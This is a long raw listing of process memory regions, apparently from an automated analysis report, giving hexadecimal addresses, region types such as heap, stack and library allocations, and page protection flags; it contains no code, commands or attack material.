2EC04FC000
|
stack
|
page read and write
|
||
215AB352000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
1FAB2E60000
|
trusted library allocation
|
page read and write
|
||
18B48C84000
|
heap
|
page read and write
|
||
24C59B50000
|
heap
|
page read and write
|
||
215AB35D000
|
heap
|
page read and write
|
||
218F157F000
|
heap
|
page read and write
|
||
18721DE0000
|
heap
|
page read and write
|
||
18721EE0000
|
heap
|
page read and write
|
||
260D92F0000
|
heap
|
page read and write
|
||
18B49D06000
|
heap
|
page read and write
|
||
18B4516C000
|
heap
|
page read and write
|
||
260C2A8C000
|
trusted library allocation
|
page read and write
|
||
218F156B000
|
heap
|
page read and write
|
||
18B47B87000
|
heap
|
page read and write
|
||
18B49B0A000
|
heap
|
page read and write
|
||
1CBB6A00000
|
heap
|
page read and write
|
||
18722007000
|
heap
|
page read and write
|
||
2BE10A52000
|
heap
|
page read and write
|
||
1F78926E000
|
heap
|
page read and write
|
||
18B4518F000
|
heap
|
page read and write
|
||
18B48EE2000
|
heap
|
page read and write
|
||
18B49065000
|
heap
|
page read and write
|
||
2BD86723000
|
heap
|
page read and write
|
||
7FFD33289000
|
trusted library allocation
|
page read and write
|
||
1C7B754B000
|
heap
|
page read and write
|
||
18B48752000
|
heap
|
page read and write
|
||
7FFDA4631000
|
unkown
|
page execute and read and write
|
||
26207380000
|
heap
|
page read and write
|
||
1C7B742B000
|
heap
|
page read and write
|
||
215AD365000
|
heap
|
page read and write
|
||
230F88D0000
|
heap
|
page read and write
|
||
18B47312000
|
heap
|
page read and write
|
||
1FF03F10000
|
heap
|
page read and write
|
||
18388090000
|
heap
|
page read and write
|
||
18387EBB000
|
heap
|
page read and write
|
||
1FAB36D3000
|
heap
|
page read and write
|
||
1651FFED000
|
heap
|
page read and write
|
||
1F788EC0000
|
heap
|
page read and write
|
||
1651FFB7000
|
heap
|
page read and write
|
||
18723E45000
|
heap
|
page read and write
|
||
7BF6A78000
|
stack
|
page read and write
|
||
7FFDA355B000
|
unkown
|
page execute and write copy
|
||
9AD2B7F000
|
stack
|
page read and write
|
||
18B472E6000
|
heap
|
page read and write
|
||
1C7B7A1B000
|
heap
|
page read and write
|
||
205C8C1D000
|
heap
|
page read and write
|
||
18B49D58000
|
heap
|
page read and write
|
||
2797DB58000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
260C1DB5000
|
trusted library allocation
|
page read and write
|
||
18721FE6000
|
heap
|
page read and write
|
||
260D925F000
|
heap
|
page read and write
|
||
18B49A33000
|
heap
|
page read and write
|
||
1FAB314B000
|
heap
|
page read and write
|
||
A3922FE000
|
stack
|
page read and write
|
||
7FFDA54BE000
|
unkown
|
page read and write
|
||
18B49A1E000
|
heap
|
page read and write
|
||
7FFD9F3D7000
|
unkown
|
page execute and read and write
|
||
205C8C2B000
|
heap
|
page read and write
|
||
18387F79000
|
heap
|
page read and write
|
||
18B48EE2000
|
heap
|
page read and write
|
||
18387EE0000
|
heap
|
page read and write
|
||
18B49527000
|
heap
|
page read and write
|
||
18387E87000
|
heap
|
page read and write
|
||
262074B0000
|
heap
|
page read and write
|
||
276C0AAE000
|
heap
|
page read and write
|
||
1FAB3142000
|
heap
|
page read and write
|
||
205C8C1D000
|
heap
|
page read and write
|
||
552FFFF000
|
stack
|
page read and write
|
||
1872259C000
|
heap
|
page read and write
|
||
18389D92000
|
heap
|
page read and write
|
||
18B4734B000
|
heap
|
page read and write
|
||
18B475EE000
|
heap
|
page read and write
|
||
1C7B92CF000
|
heap
|
page read and write
|
||
1F4C70A0000
|
heap
|
page read and write
|
||
1FF04190000
|
heap
|
page read and write
|
||
1C7B7434000
|
heap
|
page read and write
|
||
2C49D1A4000
|
heap
|
page read and write
|
||
1C7B7A01000
|
heap
|
page read and write
|
||
5B3B8B000
|
stack
|
page read and write
|
||
260C0AF0000
|
trusted library allocation
|
page read and write
|
||
7FF7B2B60000
|
unkown
|
page readonly
|
||
218F13E0000
|
heap
|
page read and write
|
||
17B1B1F0000
|
heap
|
page read and write
|
||
7FFD9DF8E000
|
unkown
|
page execute and write copy
|
||
18387F37000
|
heap
|
page read and write
|
||
18B487BB000
|
heap
|
page read and write
|
||
218F14F9000
|
heap
|
page read and write
|
||
18387F27000
|
heap
|
page read and write
|
||
1C7B7A06000
|
heap
|
page read and write
|
||
142E9F2B000
|
heap
|
page read and write
|
||
1651FFE0000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
18721FE6000
|
heap
|
page read and write
|
||
18B49A1A000
|
heap
|
page read and write
|
||
230F89D9000
|
heap
|
page read and write
|
||
18721F54000
|
heap
|
page read and write
|
||
1C7B73F6000
|
heap
|
page read and write
|
||
260D9247000
|
heap
|
page read and write
|
||
7FFD9DF60000
|
unkown
|
page readonly
|
||
18388063000
|
heap
|
page read and write
|
||
1FAB2E60000
|
trusted library allocation
|
page read and write
|
||
7FFD93460000
|
unkown
|
page readonly
|
||
1D25C890000
|
heap
|
page read and write
|
||
17B1B050000
|
heap
|
page read and write
|
||
18B47CAD000
|
heap
|
page read and write
|
||
18721FC8000
|
heap
|
page read and write
|
||
18B47A56000
|
heap
|
page read and write
|
||
2C49CF30000
|
heap
|
page read and write
|
||
16FD00E1000
|
heap
|
page read and write
|
||
18387F79000
|
heap
|
page read and write
|
||
18B47329000
|
heap
|
page read and write
|
||
18B4988B000
|
heap
|
page read and write
|
||
1CCF64D0000
|
heap
|
page read and write
|
||
7FFDA3A92000
|
unkown
|
page execute and write copy
|
||
1F788F77000
|
heap
|
page read and write
|
||
1C7B73E3000
|
heap
|
page read and write
|
||
7FFDA3A81000
|
unkown
|
page execute and read and write
|
||
1F788F85000
|
heap
|
page read and write
|
||
7FFDA54BB000
|
unkown
|
page execute and read and write
|
||
18B48A96000
|
heap
|
page read and write
|
||
18389D80000
|
heap
|
page read and write
|
||
1C7B7A2A000
|
heap
|
page read and write
|
||
7FFDA3310000
|
unkown
|
page readonly
|
||
218F1509000
|
heap
|
page read and write
|
||
18B49D13000
|
heap
|
page read and write
|
||
7FFD93FE1000
|
unkown
|
page execute and read and write
|
||
FD2CAFE000
|
stack
|
page read and write
|
||
18B489E4000
|
heap
|
page read and write
|
||
1F78964C000
|
heap
|
page read and write
|
||
1C7B754A000
|
heap
|
page read and write
|
||
CAD2DBF000
|
stack
|
page read and write
|
||
18B47C3F000
|
heap
|
page read and write
|
||
1F789654000
|
heap
|
page read and write
|
||
28DDB860000
|
heap
|
page read and write
|
||
CAD27E2000
|
stack
|
page read and write
|
||
1091EB96000
|
heap
|
page read and write
|
||
260BF0A0000
|
heap
|
page read and write
|
||
1C7B73ED000
|
heap
|
page read and write
|
||
7FF7B2B61000
|
unkown
|
page execute read
|
||
18722590000
|
heap
|
page read and write
|
||
18387DD0000
|
trusted library allocation
|
page read and write
|
||
242DF830000
|
heap
|
page read and write
|
||
869907E000
|
stack
|
page read and write
|
||
231D72D4000
|
heap
|
page read and write
|
||
1C7B73E1000
|
heap
|
page read and write
|
||
8698EFE000
|
stack
|
page read and write
|
||
2797DE80000
|
heap
|
page read and write
|
||
36DF9EF000
|
stack
|
page read and write
|
||
1F4C6DF0000
|
heap
|
page read and write
|
||
18B49D65000
|
heap
|
page read and write
|
||
7FFDA3708000
|
unkown
|
page execute and read and write
|
||
231D6CEC000
|
heap
|
page read and write
|
||
18722444000
|
heap
|
page read and write
|
||
1F78AEE6000
|
heap
|
page read and write
|
||
23F53780000
|
heap
|
page read and write
|
||
18B49E37000
|
heap
|
page read and write
|
||
18B47C41000
|
heap
|
page read and write
|
||
7FFD944A6000
|
unkown
|
page execute and read and write
|
||
7FFD9DFDF000
|
unkown
|
page execute and read and write
|
||
1C7B7428000
|
heap
|
page read and write
|
||
187225C5000
|
heap
|
page read and write
|
||
218F1490000
|
heap
|
page read and write
|
||
1AB93FE1000
|
heap
|
page read and write
|
||
24373A02000
|
heap
|
page read and write
|
||
18B48795000
|
heap
|
page read and write
|
||
231D72ED000
|
heap
|
page read and write
|
||
18B48A52000
|
heap
|
page read and write
|
||
1BC567F000
|
stack
|
page read and write
|
||
215ABA1F000
|
heap
|
page read and write
|
||
7FFDA36CE000
|
unkown
|
page read and write
|
||
2797DD00000
|
heap
|
page read and write
|
||
FD2CA79000
|
stack
|
page read and write
|
||
18B47C38000
|
heap
|
page read and write
|
||
1F788FAE000
|
heap
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
18B486F0000
|
heap
|
page read and write
|
||
583D59D000
|
stack
|
page read and write
|
||
7FFDA4330000
|
unkown
|
page readonly
|
||
23F53A04000
|
heap
|
page read and write
|
||
2245C350000
|
heap
|
page read and write
|
||
1FAB36CE000
|
heap
|
page read and write
|
||
8698FFF000
|
stack
|
page read and write
|
||
18B47A14000
|
heap
|
page read and write
|
||
18B47A05000
|
heap
|
page read and write
|
||
1F788F9E000
|
heap
|
page read and write
|
||
2EC05FF000
|
unkown
|
page read and write
|
||
18387EA3000
|
heap
|
page read and write
|
||
1F788F74000
|
heap
|
page read and write
|
||
18B48A10000
|
heap
|
page read and write
|
||
18B47399000
|
heap
|
page read and write
|
||
1F788EE0000
|
trusted library allocation
|
page read and write
|
||
7FFDA3470000
|
unkown
|
page execute and write copy
|
||
209D91D0000
|
heap
|
page read and write
|
||
1C7B79FF000
|
heap
|
page read and write
|
||
1D25C950000
|
heap
|
page read and write
|
||
18387EAC000
|
heap
|
page read and write
|
||
18387ED6000
|
heap
|
page read and write
|
||
1C7B7431000
|
heap
|
page read and write
|
||
18B48795000
|
heap
|
page read and write
|
||
218F157D000
|
heap
|
page read and write
|
||
215AD365000
|
heap
|
page read and write
|
||
1F788FA9000
|
heap
|
page read and write
|
||
1C7B92C0000
|
heap
|
page read and write
|
||
B3282FF000
|
stack
|
page read and write
|
||
1F789648000
|
heap
|
page read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
7FFD943BC000
|
unkown
|
page execute and read and write
|
||
18B48F46000
|
heap
|
page read and write
|
||
1C7B73F1000
|
heap
|
page read and write
|
||
672847F000
|
stack
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
1C7B7A02000
|
heap
|
page read and write
|
||
7FFD33120000
|
trusted library allocation
|
page execute and read and write
|
||
2B227A94000
|
heap
|
page read and write
|
||
18B472D3000
|
heap
|
page read and write
|
||
7FFDA32FE000
|
unkown
|
page execute and read and write
|
||
1C7B92CF000
|
heap
|
page read and write
|
||
1C7B79F0000
|
heap
|
page read and write
|
||
1FAB2F15000
|
heap
|
page read and write
|
||
1872244A000
|
heap
|
page read and write
|
||
1F788F93000
|
heap
|
page read and write
|
||
276C0AB0000
|
heap
|
page read and write
|
||
7FFDA3733000
|
unkown
|
page read and write
|
||
218F1405000
|
heap
|
page read and write
|
||
1C7B754E000
|
heap
|
page read and write
|
||
18387F63000
|
heap
|
page read and write
|
||
18B48949000
|
heap
|
page read and write
|
||
672827F000
|
stack
|
page read and write
|
||
231D6CA0000
|
trusted library allocation
|
page read and write
|
||
18B47BA7000
|
heap
|
page read and write
|
||
18B47C94000
|
heap
|
page read and write
|
||
7FFD93C9E000
|
unkown
|
page execute and read and write
|
||
1651FF9C000
|
heap
|
page read and write
|
||
231D8BCF000
|
heap
|
page read and write
|
||
1651FFB7000
|
heap
|
page read and write
|
||
215AB695000
|
heap
|
page read and write
|
||
230CA600000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
215AB2F7000
|
heap
|
page read and write
|
||
18B49755000
|
heap
|
page read and write
|
||
18B4519E000
|
heap
|
page read and write
|
||
215AB9FC000
|
heap
|
page read and write
|
||
260D9180000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
215AB331000
|
heap
|
page read and write
|
||
18B47394000
|
heap
|
page read and write
|
||
2797DB4D000
|
heap
|
page read and write
|
||
A391ED8000
|
stack
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
4C8D77F000
|
stack
|
page read and write
|
||
260C1110000
|
heap
|
page execute and read and write
|
||
1CBB6ACB000
|
heap
|
page read and write
|
||
260D92E0000
|
heap
|
page execute and read and write
|
||
18B45090000
|
heap
|
page read and write
|
||
7FFD331D0000
|
trusted library allocation
|
page read and write
|
||
B93F5FF000
|
unkown
|
page read and write
|
||
231D8CD0000
|
heap
|
page read and write
|
||
18B474B0000
|
direct allocation
|
page read and write
|
||
1F78964C000
|
heap
|
page read and write
|
||
18721FE4000
|
heap
|
page read and write
|
||
18B492F9000
|
heap
|
page read and write
|
||
18B47DC0000
|
direct allocation
|
page read and write
|
||
26207460000
|
heap
|
page read and write
|
||
7FFDA4177000
|
unkown
|
page read and write
|
||
1F788FA3000
|
heap
|
page read and write
|
||
1AB93FD0000
|
heap
|
page read and write
|
||
165201F0000
|
heap
|
page read and write
|
||
187225BF000
|
heap
|
page read and write
|
||
19350C90000
|
heap
|
page read and write
|
||
7FFDA3AF9000
|
unkown
|
page execute and read and write
|
||
18B497D8000
|
heap
|
page read and write
|
||
218F157C000
|
heap
|
page read and write
|
||
7FFDA4630000
|
unkown
|
page readonly
|
||
1CBB6AFC000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
215AB9F7000
|
heap
|
page read and write
|
||
255A2990000
|
heap
|
page read and write
|
||
18B48518000
|
heap
|
page read and write
|
||
1FAB2F1A000
|
heap
|
page read and write
|
||
1091EB74000
|
heap
|
page read and write
|
||
231D6D21000
|
heap
|
page read and write
|
||
18B4891B000
|
heap
|
page read and write
|
||
18B497BF000
|
heap
|
page read and write
|
||
2B2277A0000
|
heap
|
page read and write
|
||
18B49D01000
|
heap
|
page read and write
|
||
52AA2FE000
|
stack
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
7FFD9DF81000
|
unkown
|
page execute and read and write
|
||
232DE770000
|
heap
|
page read and write
|
||
D8770FC000
|
stack
|
page read and write
|
||
18B479A0000
|
heap
|
page read and write
|
||
18721FF3000
|
heap
|
page read and write
|
||
18387EAB000
|
heap
|
page read and write
|
||
18B4511E000
|
heap
|
page read and write
|
||
7FFD32F3D000
|
trusted library allocation
|
page execute and read and write
|
||
18B4960B000
|
heap
|
page read and write
|
||
1D25CC10000
|
heap
|
page read and write
|
||
1838806A000
|
heap
|
page read and write
|
||
7FFDA3560000
|
unkown
|
page readonly
|
||
1AB941E4000
|
heap
|
page read and write
|
||
2BE10D14000
|
heap
|
page read and write
|
||
18B497B8000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
262074B7000
|
heap
|
page read and write
|
||
24D95FE0000
|
heap
|
page read and write
|
||
260BF1A0000
|
heap
|
page read and write
|
||
2909FBFC000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
255A2B70000
|
heap
|
page read and write
|
||
2F532490000
|
heap
|
page read and write
|
||
18721F00000
|
trusted library allocation
|
page read and write
|
||
18B49D06000
|
heap
|
page read and write
|
||
22048D00000
|
heap
|
page read and write
|
||
276C0A9E000
|
heap
|
page read and write
|
||
18B47A05000
|
heap
|
page read and write
|
||
2B227740000
|
heap
|
page read and write
|
||
18B49B0A000
|
heap
|
page read and write
|
||
18B4797A000
|
heap
|
page read and write
|
||
1F788F93000
|
heap
|
page read and write
|
||
F79555E000
|
stack
|
page read and write
|
||
133E14B0000
|
heap
|
page read and write
|
||
24D95D50000
|
heap
|
page read and write
|
||
260C13B5000
|
trusted library allocation
|
page read and write
|
||
1091EB9E000
|
heap
|
page read and write
|
||
6219DF000
|
stack
|
page read and write
|
||
18387EF5000
|
heap
|
page read and write
|
||
18B472F7000
|
heap
|
page read and write
|
||
18B49D53000
|
heap
|
page read and write
|
||
18B477AC000
|
heap
|
page read and write
|
||
17B1B111000
|
heap
|
page read and write
|
||
7FFD331A0000
|
trusted library allocation
|
page read and write
|
||
18B4519E000
|
heap
|
page read and write
|
||
334594E000
|
stack
|
page read and write
|
||
1C7B73F6000
|
heap
|
page read and write
|
||
2C49D010000
|
heap
|
page read and write
|
||
231D6D23000
|
heap
|
page read and write
|
||
218F19F0000
|
heap
|
page read and write
|
||
7FFDA3FD1000
|
unkown
|
page execute and read and write
|
||
15ABB840000
|
heap
|
page read and write
|
||
7FFD94035000
|
unkown
|
page execute and read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
2C49D039000
|
heap
|
page read and write
|
||
19424FD0000
|
heap
|
page read and write
|
||
260D11EF000
|
trusted library allocation
|
page read and write
|
||
231D72E8000
|
heap
|
page read and write
|
||
1C7B7A1A000
|
heap
|
page read and write
|
||
B3281FF000
|
unkown
|
page read and write
|
||
215AB318000
|
heap
|
page read and write
|
||
18387F2C000
|
heap
|
page read and write
|
||
3F14FFF000
|
unkown
|
page read and write
|
||
453F9FF000
|
stack
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
1F788F7F000
|
heap
|
page read and write
|
||
215AB358000
|
heap
|
page read and write
|
||
18387F1E000
|
heap
|
page read and write
|
||
215AD35F000
|
heap
|
page read and write
|
||
18B451B8000
|
heap
|
page read and write
|
||
1F789671000
|
heap
|
page read and write
|
||
2909FD44000
|
heap
|
page read and write
|
||
1CBB6AC5000
|
heap
|
page read and write
|
||
7FFDA4638000
|
unkown
|
page execute and write copy
|
||
18B49A2C000
|
heap
|
page read and write
|
||
215ABA1A000
|
heap
|
page read and write
|
||
10E3ABAD000
|
heap
|
page read and write
|
||
209D92B0000
|
heap
|
page read and write
|
||
18B49490000
|
heap
|
page read and write
|
||
1F788F9B000
|
heap
|
page read and write
|
||
205C8C22000
|
heap
|
page read and write
|
||
7FF7B2B60000
|
unkown
|
page readonly
|
||
18721FC8000
|
heap
|
page read and write
|
||
260C2D6D000
|
trusted library allocation
|
page read and write
|
||
230CA421000
|
heap
|
page read and write
|
||
18B486AE000
|
heap
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
18B48518000
|
heap
|
page read and write
|
||
2F532350000
|
heap
|
page read and write
|
||
2909FBA7000
|
heap
|
page read and write
|
||
18B472BA000
|
heap
|
page read and write
|
||
1F4C70B0000
|
heap
|
page read and write
|
||
1C7B79F9000
|
heap
|
page read and write
|
||
1F788FB2000
|
heap
|
page read and write
|
||
9AD2AFF000
|
stack
|
page read and write
|
||
1F788FBF000
|
heap
|
page read and write
|
||
276C0A90000
|
heap
|
page read and write
|
||
2BD86726000
|
heap
|
page read and write
|
||
BF4B9FF000
|
stack
|
page read and write
|
||
18B494D2000
|
heap
|
page read and write
|
||
232DE848000
|
heap
|
page read and write
|
||
2909FBAC000
|
heap
|
page read and write
|
||
18B496D1000
|
heap
|
page read and write
|
||
18B49AB8000
|
heap
|
page read and write
|
||
18B47349000
|
heap
|
page read and write
|
||
1CBB6AED000
|
heap
|
page read and write
|
||
FD2C3DE000
|
stack
|
page read and write
|
||
1FAB2F2D000
|
heap
|
page read and write
|
||
2BD86730000
|
heap
|
page read and write
|
||
1F788FAA000
|
heap
|
page read and write
|
||
2BE10A52000
|
heap
|
page read and write
|
||
18387E86000
|
heap
|
page read and write
|
||
1C7B7543000
|
heap
|
page read and write
|
||
18721FEA000
|
heap
|
page read and write
|
||
22048DC4000
|
heap
|
page read and write
|
||
1F788FAA000
|
heap
|
page read and write
|
||
231D72D0000
|
heap
|
page read and write
|
||
205C8C1D000
|
heap
|
page read and write
|
||
22125E60000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
215AB348000
|
heap
|
page read and write
|
||
18721FFF000
|
heap
|
page read and write
|
||
2245C198000
|
heap
|
page read and write
|
||
231D6D1C000
|
heap
|
page read and write
|
||
18387DD0000
|
trusted library allocation
|
page read and write
|
||
1F78AEEE000
|
heap
|
page read and write
|
||
18B476A9000
|
heap
|
page read and write
|
||
18B492B7000
|
heap
|
page read and write
|
||
209D933B000
|
heap
|
page read and write
|
||
18B4881F000
|
heap
|
page read and write
|
||
8BCCDBC000
|
stack
|
page read and write
|
||
16FD01C0000
|
heap
|
page read and write
|
||
18723F90000
|
heap
|
page read and write
|
||
18721FC8000
|
heap
|
page read and write
|
||
18B47312000
|
heap
|
page read and write
|
||
E8E78FC000
|
stack
|
page read and write
|
||
2239CB0B000
|
heap
|
page read and write
|
||
187225C5000
|
heap
|
page read and write
|
||
18387F87000
|
heap
|
page read and write
|
||
18B478B1000
|
heap
|
page read and write
|
||
243739E0000
|
heap
|
page read and write
|
||
18B475D6000
|
heap
|
page read and write
|
||
18721FCB000
|
heap
|
page read and write
|
||
18B48BD7000
|
heap
|
page read and write
|
||
1FAB2EC9000
|
heap
|
page read and write
|
||
205C8C2B000
|
heap
|
page read and write
|
||
18B47368000
|
heap
|
page read and write
|
||
18389D9E000
|
heap
|
page read and write
|
||
187225A4000
|
heap
|
page read and write
|
||
F8688FC000
|
stack
|
page read and write
|
||
18B47CB0000
|
direct allocation
|
page read and write
|
||
7FFD9E84D000
|
unkown
|
page execute and read and write
|
||
218F14C5000
|
heap
|
page read and write
|
||
1FAB2EB9000
|
heap
|
page read and write
|
||
1C7B73F9000
|
heap
|
page read and write
|
||
1F78926E000
|
heap
|
page read and write
|
||
1C7B7404000
|
heap
|
page read and write
|
||
1F789650000
|
heap
|
page read and write
|
||
1872259F000
|
heap
|
page read and write
|
||
260BF180000
|
heap
|
page read and write
|
||
230CA5E0000
|
heap
|
page read and write
|
||
218F19D0000
|
heap
|
page read and write
|
||
18B488AA000
|
heap
|
page read and write
|
||
1F789671000
|
heap
|
page read and write
|
||
218F155B000
|
heap
|
page read and write
|
||
18B47A89000
|
heap
|
page read and write
|
||
1FAB2E60000
|
trusted library allocation
|
page read and write
|
||
18721F30000
|
heap
|
page read and write
|
||
2769FF000
|
stack
|
page read and write
|
||
7FFD93D9A000
|
unkown
|
page execute and read and write
|
||
7FFD943CE000
|
unkown
|
page execute and read and write
|
||
1CBB6AEE000
|
heap
|
page read and write
|
||
18387CB0000
|
heap
|
page read and write
|
||
231D7153000
|
heap
|
page read and write
|
||
18B48C29000
|
heap
|
page read and write
|
||
18B47336000
|
heap
|
page read and write
|
||
7FFDA3A91000
|
unkown
|
page execute and read and write
|
||
1CCF65B0000
|
heap
|
page read and write
|
||
7FFD32FE0000
|
trusted library allocation
|
page read and write
|
||
F9F7EFF000
|
stack
|
page read and write
|
||
18389D91000
|
heap
|
page read and write
|
||
222AFDD000
|
stack
|
page read and write
|
||
1FAB2F17000
|
heap
|
page read and write
|
||
18B498EE000
|
heap
|
page read and write
|
||
18B49972000
|
heap
|
page read and write
|
||
1F4C6E09000
|
heap
|
page read and write
|
||
33458CD000
|
stack
|
page read and write
|
||
18B4964D000
|
heap
|
page read and write
|
||
18B45193000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
18B48824000
|
heap
|
page read and write
|
||
18B49443000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
23F53750000
|
heap
|
page read and write
|
||
552FEFF000
|
stack
|
page read and write
|
||
18B47A05000
|
heap
|
page read and write
|
||
1651FF97000
|
heap
|
page read and write
|
||
18387F3F000
|
heap
|
page read and write
|
||
1F78AEEE000
|
heap
|
page read and write
|
||
1FAB4F66000
|
heap
|
page read and write
|
||
18B4515B000
|
heap
|
page read and write
|
||
276C0C60000
|
heap
|
page read and write
|
||
18B476B5000
|
heap
|
page read and write
|
||
7FFD33270000
|
trusted library allocation
|
page read and write
|
||
215AB348000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
215AB322000
|
heap
|
page read and write
|
||
231D6DB0000
|
heap
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
18387DB0000
|
heap
|
page read and write
|
||
2797DB0C000
|
heap
|
page read and write
|
||
1F789640000
|
heap
|
page read and write
|
||
18B473AE000
|
heap
|
page read and write
|
||
18B47A89000
|
heap
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
1C7B7380000
|
trusted library allocation
|
page read and write
|
||
7FFD9DF90000
|
unkown
|
page read and write
|
||
2302ED50000
|
heap
|
page read and write
|
||
18387F3A000
|
heap
|
page read and write
|
||
231D6D13000
|
heap
|
page read and write
|
||
19424DC7000
|
heap
|
page read and write
|
||
18B475D9000
|
heap
|
page read and write
|
||
1F78AEE2000
|
heap
|
page read and write
|
||
18B4A202000
|
heap
|
page read and write
|
||
215ABA29000
|
heap
|
page read and write
|
||
18B47A74000
|
heap
|
page read and write
|
||
187225BD000
|
heap
|
page read and write
|
||
18387F3F000
|
heap
|
page read and write
|
||
231D6C80000
|
heap
|
page read and write
|
||
18B498ED000
|
heap
|
page read and write
|
||
18B4A3E6000
|
heap
|
page read and write
|
||
18387F79000
|
heap
|
page read and write
|
||
187225A4000
|
heap
|
page read and write
|
||
2302ECD0000
|
heap
|
page read and write
|
||
7FFDA3301000
|
unkown
|
page execute and read and write
|
||
231D72D7000
|
heap
|
page read and write
|
||
243739F2000
|
heap
|
page read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
D8772FF000
|
stack
|
page read and write
|
||
7BF6AFE000
|
stack
|
page read and write
|
||
18B47321000
|
heap
|
page read and write
|
||
CAD2FAF000
|
stack
|
page read and write
|
||
18B4734E000
|
heap
|
page read and write
|
||
1CBB69F0000
|
heap
|
page read and write
|
||
18B49A1A000
|
heap
|
page read and write
|
||
1FF03F98000
|
heap
|
page read and write
|
||
2F532392000
|
heap
|
page read and write
|
||
260D1331000
|
trusted library allocation
|
page read and write
|
||
7FFDA0860000
|
unkown
|
page readonly
|
||
18B4734B000
|
heap
|
page read and write
|
||
7FFD33230000
|
trusted library allocation
|
page read and write
|
||
242DF83B000
|
heap
|
page read and write
|
||
142E9EB0000
|
heap
|
page read and write
|
||
1F78966D000
|
heap
|
page read and write
|
||
18388067000
|
heap
|
page read and write
|
||
1C7B7405000
|
heap
|
page read and write
|
||
1091ED94000
|
heap
|
page read and write
|
||
18B49234000
|
heap
|
page read and write
|
||
1872244E000
|
heap
|
page read and write
|
||
18B472D4000
|
heap
|
page read and write
|
||
52AA078000
|
stack
|
page read and write
|
||
7FFD32FE6000
|
trusted library allocation
|
page read and write
|
||
1FAB36E8000
|
heap
|
page read and write
|
||
2797DB58000
|
heap
|
page read and write
|
||
18B4799B000
|
heap
|
page read and write
|
||
1FAB2F10000
|
heap
|
page read and write
|
||
24373A02000
|
heap
|
page read and write
|
||
18B49A07000
|
heap
|
page read and write
|
||
18B47A89000
|
heap
|
page read and write
|
||
18B49DB7000
|
heap
|
page read and write
|
||
18387F42000
|
heap
|
page read and write
|
||
187225AA000
|
heap
|
page read and write
|
||
2245C1A1000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
215AB2F3000
|
heap
|
page read and write
|
||
18B4776D000
|
heap
|
page read and write
|
||
1D25C958000
|
heap
|
page read and write
|
||
7FFD94091000
|
unkown
|
page execute and read and write
|
||
1C1C0FE000
|
stack
|
page read and write
|
||
1F789653000
|
heap
|
page read and write
|
||
215ABA29000
|
heap
|
page read and write
|
||
7FFDA3FD9000
|
unkown
|
page execute and read and write
|
||
18387EA3000
|
heap
|
page read and write
|
||
7FFD32F4B000
|
trusted library allocation
|
page read and write
|
||
1651FFDC000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
7FFDA4DAF000
|
unkown
|
page read and write
|
||
18B45151000
|
heap
|
page read and write
|
||
18387EEF000
|
heap
|
page read and write
|
||
1FAB2F28000
|
heap
|
page read and write
|
||
1FAB4F6D000
|
heap
|
page read and write
|
||
18B49D06000
|
heap
|
page read and write
|
||
2239CA54000
|
heap
|
page read and write
|
||
18B47A0B000
|
heap
|
page read and write
|
||
10E3AE80000
|
heap
|
page read and write
|
||
205C8C23000
|
heap
|
page read and write
|
||
2BE10A30000
|
heap
|
page read and write
|
||
1FAB2F05000
|
heap
|
page read and write
|
||
18B48F46000
|
heap
|
page read and write
|
||
218F1400000
|
heap
|
page read and write
|
||
7FFDA3703000
|
unkown
|
page execute and read and write
|
||
18B4734D000
|
heap
|
page read and write
|
||
2F53237B000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18388060000
|
heap
|
page read and write
|
||
1CBB6A20000
|
heap
|
page read and write
|
||
1FAB36F3000
|
heap
|
page read and write
|
||
2BE10B30000
|
heap
|
page read and write
|
||
18B473AC000
|
heap
|
page read and write
|
||
1091EB9B000
|
heap
|
page read and write
|
||
2302ED71000
|
heap
|
page read and write
|
||
18389D9E000
|
heap
|
page read and write
|
||
1F78965C000
|
heap
|
page read and write
|
||
18B47A89000
|
heap
|
page read and write
|
||
260D9720000
|
heap
|
page read and write
|
||
231D7150000
|
heap
|
page read and write
|
||
18B4916D000
|
heap
|
page read and write
|
||
215AB348000
|
heap
|
page read and write
|
||
260BF2A3000
|
heap
|
page read and write
|
||
18B472F8000
|
heap
|
page read and write
|
||
1FAB314E000
|
heap
|
page read and write
|
||
1C7B7A0C000
|
heap
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
276C0AA8000
|
heap
|
page read and write
|
||
B93F4FC000
|
stack
|
page read and write
|
||
24D95E50000
|
heap
|
page read and write
|
||
1F4C6DA0000
|
heap
|
page read and write
|
||
2BD86727000
|
heap
|
page read and write
|
||
215AB69A000
|
heap
|
page read and write
|
||
7FFD33280000
|
trusted library allocation
|
page read and write
|
||
1C7B92C8000
|
heap
|
page read and write
|
||
18B49D79000
|
heap
|
page read and write
|
||
583D8FF000
|
stack
|
page read and write
|
||
1F7892FD000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
